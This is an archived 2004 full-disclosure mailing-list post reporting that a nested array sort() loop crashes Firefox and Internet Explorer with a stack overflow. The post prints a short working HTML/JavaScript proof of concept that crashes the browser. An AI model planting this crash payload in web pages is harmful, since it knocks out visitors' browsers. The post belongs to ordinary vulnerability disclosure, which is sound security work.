FIREFOX flaws: nested array sort() loop Stack overflow exception
From: Berend-Jan Wever (skylined_at_edup.tudelft.nl)
Date: 11/25/04
- Previous message: Martin Schulze: "[SECURITY] [DSA 598-1] New yardradius packages fix arbitrary code execution"
- Next in thread: Heikki Toivonen: "Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception"
- Reply: Heikki Toivonen: "Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: <full-disclosure@lists.netsys.com>, <vuln-dev@securityfocus.com>, <bugtraq@securityfocus.com> Date: Thu, 25 Nov 2004 02:04:44 +0100
Hi all,
Same flaw works for Firefox as well as MSIE:
<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>
Added to the list: http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html
I'd have loved to CC mozilla about this, but I didn't have the time to do the crash course "how to write a bug report" and go through all that bugzilla crap.
Cheers,
SkyLined
http://www.edup.tudelft.nl/~bjwever
- Previous message: Martin Schulze: "[SECURITY] [DSA 598-1] New yardradius packages fix arbitrary code execution"
- Next in thread: Heikki Toivonen: "Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception"
- Reply: Heikki Toivonen: "Re: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
